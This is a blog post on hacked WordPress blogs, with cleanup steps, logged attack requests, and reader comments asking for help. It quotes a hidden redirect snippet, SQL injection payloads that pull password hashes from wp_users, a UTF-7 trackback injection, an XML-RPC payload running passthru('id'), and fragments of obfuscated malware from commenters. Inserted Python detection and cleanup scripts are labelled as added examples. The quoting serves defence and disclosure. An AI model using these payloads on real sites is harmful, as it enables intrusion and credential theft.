Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.
In the last week the hackers have started again. There is no zero-day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net.
If you’ve been hacked
- Upgrade to the latest version of WordPress.
- Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
- Change your passwords after upgrading and make sure the hacker didn’t create another user.
- Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
define('SECRET_KEY', '1234567890');
Hidden Code
The bad guys are using a number of ways to hide their hacks:
- The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten, so make sure you double check those files for any strange code that uses the eval() command or base64_decode(). Here’s a code snippet taken from here:
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php
Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
- Check your .htaccess file in the root of your blog. If you’ve never edited it, it should look like this:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
That file may have this chunk of code too which is to do with the uploader:
<IfModule mod_security.c>
<Files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>
- They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
- Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
- Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
- Check your uploads directory for that jpg file and delete it.
- This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
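What "remove the serialized array information" means in practice, as an added example (not code from the original post or from WordPress): active_plugins is stored as a PHP-serialized array whose element count and string lengths must stay consistent, so this Python sketch parses the value, drops entries that cannot be real plugin files, and re-serializes it. The sample value and the rule for what counts as suspicious are assumptions constructed for illustration.

```python
import re

# One element of a PHP-serialized list of strings: i:INDEX;s:LENGTH:"
ELEMENT = re.compile(rb'i:\d+;s:(\d+):"')


def parse_string_array(data: bytes) -> list:
    """Parse a:N:{i:0;s:LEN:"text";...} and verify the count and every length."""
    head = re.match(rb"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a serialized PHP array")
    pos, items = head.end(), []
    for _ in range(int(head.group(1))):
        m = ELEMENT.match(data, pos)
        if not m:
            raise ValueError("malformed element at byte %d" % pos)
        start = m.end()
        end = start + int(m.group(1))  # s:LEN counts bytes, not characters
        if data[end:end + 2] != b'";':
            raise ValueError("string length mismatch at byte %d" % start)
        items.append(data[start:end])
        pos = end + 2
    if data[pos:] != b"}":
        raise ValueError("element count does not match the a:N header")
    return items


def serialize_string_array(items) -> bytes:
    """Re-serialize with fresh indexes, lengths and element count."""
    body = b"".join(
        b'i:%d;s:%d:"%s";' % (i, len(s), s) for i, s in enumerate(items)
    )
    return b"a:%d:{%s}" % (len(items), body)


def is_suspicious(entry: bytes) -> bool:
    """Assumed rule: a plugin entry is a relative path to a .php file
    with no parent-directory segments (e.g. akismet/akismet.php)."""
    return (
        not entry.lower().endswith(b".php")
        or entry.startswith(b"/")
        or b".." in entry.split(b"/")
    )


def clean_active_plugins(data: bytes):
    """Return (cleaned serialized value, list of removed entries)."""
    items = parse_string_array(data)
    kept = [e for e in items if not is_suspicious(e)]
    removed = [e for e in items if is_suspicious(e)]
    return serialize_string_array(kept), removed


# Constructed sample: two ordinary plugins plus the kind of entry shown above.
SAMPLE = serialize_string_array([
    b"akismet/akismet.php",
    b"../uploads/2008/05/04/jhjyahjhnjnva.jpg",
    b"hello.php",
])

# What you get if you delete only the path text by hand: the s:39 length and
# the a:3 count no longer describe the data, so the value will not parse.
HAND_EDITED = SAMPLE.replace(b"../uploads/2008/05/04/jhjyahjhnjnva.jpg", b"")

if __name__ == "__main__":
    cleaned, removed = clean_active_plugins(SAMPLE)
    print("before :", SAMPLE.decode())
    print("after  :", cleaned.decode())
    print("removed:", [r.decode() for r in removed])
    try:
        parse_string_array(HAND_EDITED)
    except ValueError as exc:
        print("hand-edited value is corrupt:", exc)
```

Keep a copy of the original option_value before writing the cleaned string back.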
Change Your Passwords
Once you’ve upgraded and verified that your install is clean again you must do the following:
- Change the passwords of all users on your system.
- Make sure the hacker hasn’t added another user account he can use to login again.
Stop the bad guys
One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).
- I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
- The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinit
In the configuration file above I put the following:
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*
That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
Please Upgrade
There is absolutely no reason not to upgrade. WordPress is famous for its 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.
Help a friend
Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:
<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->
What does a hack look like?
I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
- First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
- Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
)
- When that fails, he grabs xmlrpc.php.
- He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
HTTP_RAW_POST_DATA: <?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member>
- That fails too so the query is repeated with similar SQL.
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
- Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\'
[1740009377] => 1
[496546471] => 1
)
- And another trackback:
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\')/*
[charset] => UTF-7
)
- Before finally going back to xmlrpc.php with this POST request:
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall>
- In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
- Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
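The requests listed above share a few stable markers, so they can be flagged in your own request logs. The following Python sketch is an added example, not code from the original post; the request records are constructed from the requests quoted above (the trackback form body is an assumed encoding of the array shown), and the rule names are made up for illustration.

```python
import re
from urllib.parse import unquote_plus

MAX_DECODE_ROUNDS = 5  # %2527 needs two rounds to become a quote


def fully_decode(value: str) -> str:
    """URL-decode repeatedly until the text stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


UNION_WP_USERS = re.compile(
    r"\bunion\s+(?:all\s+)?select\b.*?\bfrom\s+wp_users\b", re.I | re.S)
DOUBLE_ENCODED_QUOTE = re.compile(r"%25(?:27|22)", re.I)
PHP_CALL = re.compile(r"\b(?:passthru|eval)\s*\(", re.I)
UTF7_CHARSET = re.compile(r"\bcharset=utf-7\b", re.I)


def classify(req: dict) -> list:
    """Return the sorted names of every rule a request record matches."""
    url = req.get("url", "")
    body = req.get("body", "")
    agent = req.get("user_agent", "")
    decoded = fully_decode(url) + "\n" + fully_decode(body)
    hits = set()
    if "k1b compatible" in agent.lower():
        hits.add("k1b-user-agent")
    if DOUBLE_ENCODED_QUOTE.search(url + body):
        hits.add("double-encoded-quote")
    if UNION_WP_USERS.search(decoded):
        hits.add("union-select-wp_users")
    if "wp-trackback.php" in url and UTF7_CHARSET.search(decoded):
        hits.add("utf7-trackback")
    if "xmlrpc.php" in url and PHP_CALL.search(decoded):
        hits.add("php-in-xmlrpc")
    return sorted(hits)


K1B_AGENT = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

# Constructed request records, built from the requests quoted in this post.
SAMPLE_REQUESTS = [
    {"url": "/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,"
            "CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/*",
     "user_agent": K1B_AGENT, "body": ""},
    {"url": "/xmlrpc.php", "user_agent": K1B_AGENT,
     "body": "<value><string>http://ocaoimh.ie/category/&post_type=%27) "
             "UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,"
             "1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>"},
    {"url": "/wp-trackback.php?p=1", "user_agent": K1B_AGENT,
     "body": "url=ekibastos&title=ekibastos&excerpt=ekibastos"
             "&blog_name=%2BAFw-%5C%27)/*&charset=UTF-7"},
    {"url": "/xmlrpc.php", "user_agent": "-",
     "body": "<methodName>test.method</methodName><value><name>','')); "
             "passthru('id'); exit;/*</name></value>"},
    # Harmless search that merely contains the words "union select".
    {"url": "/?s=student+union+select+committee",
     "user_agent": "Mozilla/5.0", "body": ""},
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request["url"][:40].ljust(42), classify(request))
```

Decoding before matching is what catches the `%2527` variant, which a single pass leaves as `%27`.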
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
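A minimal version of the file checks described under Hidden Code, as an added Python example (this is not the Exploit Scanner plugin's code): it flags eval() and base64_decode() calls in PHP files, decodes literal base64 arguments so the hidden text is visible, looks for the k1b0rg and keymachine.de markers, and reports image files that contain PHP. The sample file content is constructed from the snippet quoted above.

```python
import base64
import binascii
import os
import re

# base64_decode("literal") or base64_decode('literal')
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
EVAL_CALL = re.compile(r"\beval\s*\(")
MARKERS = ("k1b0rg", "keymachine.de")
IMAGE_EXTS = (".jpg", ".jpeg", ".gif", ".png")


def scan_php_source(text: str) -> list:
    """Return (line number, rule, detail) tuples for one PHP file's text."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if EVAL_CALL.search(line):
            findings.append((number, "eval", ""))
        literals = list(B64_CALL.finditer(line))
        for match in literals:
            try:
                raw = base64.b64decode(match.group(2), validate=True)
                detail = raw.decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                detail = "<not valid base64>"
            findings.append((number, "base64_decode", detail))
        if "base64_decode" in line and not literals:
            findings.append((number, "base64_decode", "<non-literal argument>"))
        for marker in MARKERS:
            if marker in line.lower():
                findings.append((number, "marker", marker))
    return findings


def scan_tree(root: str) -> dict:
    """Walk a directory; map relative path -> findings for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as handle:
                raw = handle.read()
            lower = name.lower()
            if lower.endswith(".php"):
                hits = scan_php_source(raw.decode("utf-8", "replace"))
            elif lower.endswith(IMAGE_EXTS) and b"<?php" in raw:
                hits = [(0, "php-in-image", "")]  # PHP disguised as an image
            else:
                hits = []
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


# Constructed sample: the redirect line from the snippet above plus a marker.
SAMPLE_THEME_FILE = (
    '<?php if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://"'
    '.base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>\n'
    "<?php get_header(); // k1b0rg ?>\n"
)

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_THEME_FILE):
        print(finding)
```

Some legitimate code also calls eval() or base64_decode(), so treat each hit as a line to read, not as proof of a hack.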
We also got hit
Our press release section got screwed over by the hacker.
We did also think about the issue of restoring your permalinks, and the need to do them EXACTLY as they were in the past, to avoid loss of search engine results, and possibly traffic… Most people have easy to remember permalinks, but for people that don’t, and who are silly enough not to have the structure backed up (cough) then here is a guide: http://www.kingpin-seo.co.uk/press-releases/how-to-recover-your-permalinks-settings-to-get-your-indexed-posts-back-dont-loose-google-serps/116611
Hope you don’t mind me linking to it! – Not trying to spam you guys, just trying to help bloggers avoid SERP loss.
Great info! Thanks for the information. Fortunately, I upgraded before being hacked. However, there are some best practices that I need to update my site with.
BTW…love the WP-Supercache plugin. Thanks!!!
I may have been hacked, at the very least I had people add themselves as users, never got to the ADMIN point I think, but I did find this in my php code… I use the revolution theme… and am not sure if this should be there or not.
There doesn’t appear to be anything wrong with the site or pages but here is the code:
SELECT *
FROM `DatabasenameXXXXXXXXXXXX`.`wp_options`
WHERE (
`option_id` LIKE '%base64_decode%'
OR `blog_id` LIKE '%base64_decode%'
OR `option_name` LIKE '%base64_decode%'
OR `option_value` LIKE '%base64_decode%'
OR `autoload` LIKE '%base64_decode%'
)
LIMIT 0 , 30
Am I ok.. or did something happen?
Great piece! Looks like I was hacked today! I’ve upgraded to the new WP but the problem I’m having is that when I go to admin – posts – it tells me there are no posts found – but the numeric line above it states that there are posts. My categories are also missing.
Any suggestions as to where to look? Please help!!!!!!
Thanks,
Hi there
Looking desperately for help
I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you
My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to click the default permalink structure again and click save changes, now your posts should be working again, mine start working again.
I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.
Thank you for all this useful information. Unfortunately it's a matter of time until a Wordpress blog will be attacked by hackers, in a form or other. The main rule is a constant DB backup. Upgrade your WP and the plugins when it's possible, try to protect as much you can, in this article you can find useful details, but don't forget, secure your important dates by regular backups.
For the sake of helping of course, i want to say something else.
When i was hacked, i mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, i guess the hacker who wrote the worm did not want to make damage, real and extensive damage i mean, i guess he wanted only to scare people into upgrading your wordpress blog which makes me think a lot, i mean, who would want to scare every wordpress blog user in to upgrading to the latest patch!!!?
But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.
If you go to the theme editor in the appearance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation on your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, i mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the files permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code in to the files you just change permissions to writable.
Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, believe me, i really informed myself on this, delete it and deactivate the service by going to the wordpress control panel, then in general options in some menu i can not recall the name, just browse through all and set it off, you do not need that.
Hope i helped.
Someone changing my urls like
Original URLs were
http://mydomain.com/2009/08/14/my-post/
changed url
mydomain.com/?p=68
Please advise how to prevent this
Several of my sites were exploited by a hacker recently. As far as I am aware the hack used the wordpress php vulnerability to gain access to my server and rather than creating havoc with wordpress files appears to have defaced one of my html sites by deleting the home page and uploading his or hers own stupid home page. So, in this case they used wordpress to gain entry but did not do anything only deface an unrelated non wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! Changed all passwords, ftp, admin, sql and any other I could think of! It really is not nice being hacked and is a real pain in the rear so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not so it's a good deterrent.
Someone changing my urls like
Original URLs were
http://mydomain.com/2009/08/14/my-post/
changed url
mydomain.com/?p=68
How they changed it…any clue
As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.
Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.
Henceforth, I thought I was running with WP 2.8.4.
That is, until yesterday!
cPanel – Fantastico | WordPress
displayed in RED upgrade now to WP 2.8.4
Shock horror!
Install by Fantastico and it controls WordPress.
Upgrades by WP Wordpress do not update.
Warning:
WordPress upgrades – immediate.
Fantastic WP upgrades – timing delay, therefore, security risk.
My site been hacked.
I found the following injected code on my wordpress theme footer.php
if (!isset($_COOKIE["tll"])) echo “”;
My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with "1"); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.
Thank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
Then i changed my WP name/password.
But the links came back a week later.
Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
ROSACEA:
How do i know what is safe to delete??
I feel like I am flying blind.
Any other tips will be appreciated.
Run the exploit scanner plugin to find the backdoor that has been installed on your system!
Hi Donncha-
Thank you SO much for replying to me. SO even though i keep deleting these hidden links from my header.php and then re upload the original header.php and i’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!
I’ve also deleted fake users and some odd user metadata.
Now, i ran your Exploit Plug in and this:
<?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
…plus a bunch of script comes up in what appears to be every plug in.
It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
Lisa
Site was hacked yesterday…..
The code at the bottom of this reply was added to several php files and script.js files.
I searched through all the files that were added at that time and copied some files from original wordpress installation to make the site work again.
I hope it is all clean now but know I have to do more to prevent this from happening again.
I am so annoyed that there are idiots spoiling peoples fun of setting up a website!
Thanks for the tips mentioned above it helped me getting the site back up and running, but still trying to find better security to prevent this from happening again.
Any tips are welcome!
/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement(’script’);X08yhffhg7xkxf.setAttribute(‘type’, ‘text/javascript’);X08yhffhg7xkxf.setAttribute(‘id’, ‘myscript1′);X08yhffhg7xkxf…. etcetr you get the point
Please try my script for fixing the files and make sure to change FTP passwords from your sites – they have been compromised
The link for the script: http://justcoded.com/wp-content/uploads/2009/12/curevir.php.txt
You can also check the post of my friend Martin to learn more about the virus and the experience of using my script
http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html
I posted the article about this here:
http://justcoded.com/article/gumblar-family-virus-removal-tool/
Thanks, this script is brilliant. Still getting hacked regularly so I haven’t solved the underlying problem but by running your script the site is up most of the time, I am setting up a new site, with all new usernames and passwords.
Had to reinstall my pc as well because it got infected
My wordpress account was hacked, and I am trying to erase links that have been embedded to my site. I recently upgraded to the latest version of wordpress, changed my passwords, etc. Is there a way to edit my html to delete these embedded links? Here is my website: liisainvermont.com
We got hacked, we have fixed it but it happened again,
any suggestions for us?
thanks
Ed – didn’t you read the entire article?
It says upgrade wordpress and check for files that might be corrupt or changed from original. Also check all the folders you set write rights to.
I would do it with next steps:
1. backup entire mySql database to local computer
2. delete mySql database and create new mySql database
3. restore tables from local backup
4. check tables for users and change passwords (hacker might have old passwords)
5. create clean install of latest wordpress
6. upgrade data in mysql as needed
Hope this helps…
I’m still not clear on this… if I delete the DB then upload the one I backed up, won’t it contain the fake users still?
check tables for users and change passwords (hacker might have old passwords)
How do I do this in MyPHPAdmin????
Like many I've had not only a wordpress site hacked but then my server and not for the first time. Yes I backup but that's not the point.
It's come to a point where I changed hosts which took time and money
I wish I knew what to delete in MyPhpAdmin!!! This post assumes you know.
These tips always from nerd to nerd thing. Nobody wants to help regular guy. Thanks anyway.
Mikko – and sometimes the “regular guy” isn’t willing to learn how to administer a website and be responsible for it. Sounds harsh I know but you wouldn’t drive a car without getting some lessons first would you?
Hi Donncha, I don’t know if I’m being hacked or not, but I keep finding a new user in my list of users. They are calling themselves admin, but with no role assigned. He/she/it has made several draft posts. I am using wp2.9.1. Any ideas?
Follow all the advice in the post above, that will go a long way to getting rid of that user for good!
Thanks so much for the advice it came in very handy.
In my case it was in the header and was one very long line of code that seemed like it was just numbers and would be harmless, but it was the problem.
It blocked me..
1. I couldn’t perform from Firefox a simple view source code
2. Even with “NoScript” on full alert
3. Every time I would try, it would try to give me a Trojan.
4. FTPing the header file and attempting to view the local file with notepad also prompted an a/v alert.
5. I ended up using CPanel’s internal file editor to review the malicious code and remove it.
Thanks again so much for your help.
Donncha,
I loved the write-up above and will try it , especially the plugin to see what’s wrong with my site. The site works but the RSS feed http://feeds.feedburner.com/indimag is fried. I get the following :
Warning: session_start() [function.session-start]: open(/home/39725/data/tmp/sess_a694ffa38088c1954d4fcf657b2f0c54, O_RDWR) failed: Disk quota exceeded (122) in /nfs/c02/h08/mnt/39725/domains/indimag.com/html/wp-content/plugins/wordpress-automatic-upgrade/wordpress-automatic-upgrade.php on line 121
I would greatly greatly appreciate your/any other commenter’s thoughts on the issue.
Peace,
Madhu
INDIMAG.com
“Disk quota exceeded” – your disk is full.
Also, it looks like your website is on an NFS drive which is bad for caching. You should cache to a local drive.
Donncha,
I know of the NSF but to get local it costs and I’m living with it.
On the disk being full , per the disk usage report I can see I’m using just 2-3 % of my total available disk space — non dedicated , shared , but more than 9 GB free and usage is in MBs only as of now…
My hosting company is just telling using that disk usage report and saying it cannot be the disk, ought to be the plug in ..
Unfortunately you do need local storage if you want to use the plugin. There’s no way around it.
i have been hacked too
at this year july … bull shit! fucking hackers!
Hi Donncha,
You’ve given really great information here and I will definitely apply it. I only have one problem: cant even get into the back end of my blog!! Do you have any suggestions?
When i try to go in with firefox, my antivirus comes up with the Mal/iframe-f If i try to go in with IE it doesnt let me even get near the blog front end or backend.
once i log in with firefox – everything goes to a white screen and hangs. Had googled and tried to find out what to do but your information is more extensive. do you ever do paid work?
(coz I am at my wits end and i dont have enough knowledge of php to know what to delete and what not to)
i have upgraded, added exploit, have manually looked through files for obvious iframes (didnt look for the rest of the code you’ve revealed here though).
have downloaded, scanned for malware with 5 different programs, have deleted users, changed passwords, and stood on my head with this thing !!!
any advice is appreciated
Please let me know about the paid thing
Thanks
Gaylea
very helpful, thanks! THis beats the mindless and annoying task of reloading everything!
I wanted to mention a couple of plugins that can really help keep your blog protected, especially to all you non-coding webmasters…
One is called Wordpress Firewall. It basically protects your Wordpress software from attempts to login, hack passwords or use the query strings to inject code or look for weaknesses. Pro’s: Closes another door or two in the face of hackers. Con’s: Have to ensure your current IP address is listed so you can edit your blog. (Check out whatismyip.com to find it)
Another is Wordpress Antivirus. This basically scans your theme files for injected type code. Tho not foolproof, it does add another layer of possible protection.
I also use Wordpress Scanner to scan my installation for security holes.
Just Google any of these names and the word “wordpress” or “plugin” at the same time.
And remember, the safety of your blog and your visitors is in your hands… get proactive.
I use WPMU and Love WordPress!! I had 13 sites totaling 4000+ “Real” members, and within a few hours I had 10,000+ Fake members all mixed in! And no sites! Most of the Fake blogs and user emails I noticed (later) were short first name sounding and all had numbers ending that short name, like saally272645343 had matching emails like saally272645343@whateverfake.com
I also found a theme with files all cute and pretty :{ with images labeled as a lot of the codes you mention above, theme was named flavour-extended-png in the themes folder, I am almost sure it is infected. Thank you for all the help wordpress world
Keep the Faith
[...] Last Update: Donncha, explaining the whole thing. [...]
[...] Did your WordPress site get hacked? is a great post by Donncha examining the latest “popular” hack(s), how to prevent them and/or how to recover. [...]
[...] According to Donncha, 2.5.x is not vulnerable to this, but I’ve personally seen a number of 2.5.x sites that are [...]
[...] to Donncha O Caoimh of Automattic, this exploit took advantage of a vulnerability that has been fixed in the latest stable version of WordPr…. As he points out, although 2.5.1 sites have succumbed to the attack, the evidence so far is that [...]
[...] do some research before you post: Did your WordPress site get hacked? All those wankers who claim that they were hacked even when they had upgraded to 2.5.1 were lying [...]
[...] hacked to redirect search engine queries. So I spent this morning working on a post about that hacking issue. No wonder we were late for the photowalk this [...]
[...] thread http://www.netpond.com/blogging-foru…idespread.html This is the official solution Did your WordPress site get hacked? This is for laughing at wankers WordPress › Support Wordpress Hacked and Redirected … [...]
[...] Diesmal gehen die kriminellen Cracker nicht so vor, dass sie das Blog sichtbar übernehmen, sondern sie leiten nur die Google-Suchergebnisse auf ihre kriminellen Spamseiten um. Aber die tolle Empfehlung, dass man doch einfach die aktuelle WP-Version nehmen soll, um etwas [...]
[...] another source of concern might be hacking. I wouldn’t want to let a hacker wander through my articles database and delete them all. The [...]
[...] Article: Holy Shmoly! Did your WordPress site get hacked? [...]
[...] articolo è stato scritto da Donncha O Caoimh proprio ieri, 8 giugno 2008. Mi è parso di assoluto interesse e vi propongo, dietro il permesso personale dell’autore, [...]
[...] some general advice on protecting wordpress from hacks and attacks. It contains some good piece of information + software that you can use to [...]
[...] questa parte vi lascio all’articolo originale e alla traduzione di aldolat perchè nella stragrande maggioranza dei casi non gestite da voi il [...]
[...] los foros de WordPress, ninguna persona con relación a la empresa ha emitido palabra alguna. Sólo Donncha ha informado que la rama 2.5.X no es vulnerable, aunque varios bloggers hemos dicho y seguimos diciendo lo contrario, debido a que nos hemos [...]
[...] Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for. [...]
